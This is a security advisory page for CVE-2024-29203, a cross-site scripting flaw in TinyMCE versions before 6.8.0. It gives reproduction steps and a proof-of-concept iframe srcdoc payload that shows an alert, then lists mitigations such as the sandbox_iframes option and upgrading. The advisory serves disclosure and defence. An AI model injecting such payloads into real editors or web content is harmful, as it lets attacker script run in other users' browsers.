CVE-2024-29203

Cross-Site Scripting
Affects
TinyMCE
in
No items found.
Versions
<6.8.0
Exclamation circle icon
Patch Available

This Vulnerability has been fixed in the Never-Ending Support (NES) version offered by HeroDevs

Overview

TinyMCE is a web-based JavaScript HTML WYSIWYG editor control.

A Cross-Site Scripting (XSS) vulnerability (CVE-2024-29203) has been identified in TinyMCE, which allows iframe elements containing malicious code to execute when inserted into the editor. Attacks are limited by same-origin browser protections, but could still trigger operations such as downloading of malicious assets.

Per OWASP: Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. An attacker can use XSS to send a malicious script to an unsuspecting user.

This issue affects TinyMCE versions less than 6.8.0.

Details

Module Info

*: The fix is opt-in in v6.8.0 and is enabled by default in v7.0.0.

Vulnerability Info

This Medium-severity vulnerability is found in TinyMCE versions less than 6.8.0.

In versions greater than or equal to 6.8.0, there is a way to resolve this vulnerability directly by setting the editor option sandbox_iframes to be true, but by default this option is set to false. This was changed in version 7.0.0 to be true by default.

Steps To Reproduce

  • Create a folder and name it public. Copy the TinyMCE files into this folder so that the path ./public/tinymce/tinymce.min.js is valid. For example, if you used npm to install tinymce, copy the contents of the folder node_modules/tinymce into public/tinymce.
  • Create an HTML file next to the public folder that was just created. Add the self-hosted TinyMCE script to the <head> section. For example:
<script src="public/tinymce/tinymce.min.js"></script>

  • In the body of the HTML file, add a section with a button and a textarea. This will be to display the XSS via iframe[srcdoc]. For example:
<div>
  <button onclick="injectIframePayload()">Inject iframe[srcdoc] Payload
</button>
  <textarea id="editor"></textarea>
</div>

    • Add an instance of TinyMCE in a <script> section. For example:
let editor;


tinymce.init({
  selector: '#editor',
  extended_valid_elements: 'iframe[src|srcdoc|sandbox]',
  setup: (data) => {
    editor = data;
  }
});

  • In the same <script> section, add two functions that were referenced earlier in the second step. For example:
function injectIframePayload() {
  const html = `<iframe srcdoc="<script>alert('CVE-2024-29203')<\/script>"></iframe>`;
  editor?.setContent(html);
}

  • Run the application and click on the Inject iframe[srcdoc] Payload button. A popup will appear demonstrating the Cross-Site Scripting (XSS) vulnerability.

Proof Of Concept

A full reproduction with code similar to the above can be found here:

HTML injection XSS vulnerability POC

<iframe height="300" style="width: 100%;" scrolling="no" title="TinyMCE  vulnerability: XSS vulnerability in Handling Iframes" src="https://codepen.io/herodevs/embed/xbGyjyv/299b960421ba116f94e660cfb2d3d4f8?default-tab=html%2Cresult" frameborder="no" loading="lazy" allowtransparency="true" allowfullscreen="true">
  See the Pen <a href="https://codepen.io/herodevs/pen/xbGyjyv/299b960421ba116f94e660cfb2d3d4f8">
  TinyMCE  vulnerability: XSS vulnerability in Handling Iframes</a> by HeroDevs (<a href="https://codepen.io/herodevs">@herodevs</a>)
  on <a href="https://codepen.io">CodePen</a>.
</iframe>

Mitigation

TinyMCE versions below 6.8 are End-of-Life and will not receive any updates to address this issue. For more information see here.

Users of the affected components should apply one of the following mitigations:

  • Migrate affected applications to a version of TinyMCE that includes the fix.
  • Leverage a commercial support partner like HeroDevs for post-EOL security support.

No items found.
Vulnerability Details
ID
CVE-2024-29203
PROJECT Affected
TinyMCE
Versions Affected
<6.8.0
Published date
July 30, 2025
≈ Fix date
June 13, 2025
Fixed in
Severity
Level
CVSS Assessment
Low
>=0 <4
Medium
>=4 <6
High
>=6 <8
Critical
>=8 <10
Medium
Category
Cross-Site Scripting
Sign up for the latest vulnerability alerts fixed in
Rss feed icon
Subscribe via RSS
or

By clicking “submit” I acknowledge receipt of our Privacy Policy.

Thanks for signing up for our Newsletter! We look forward to connecting with you.
Oops! Something went wrong while submitting the form.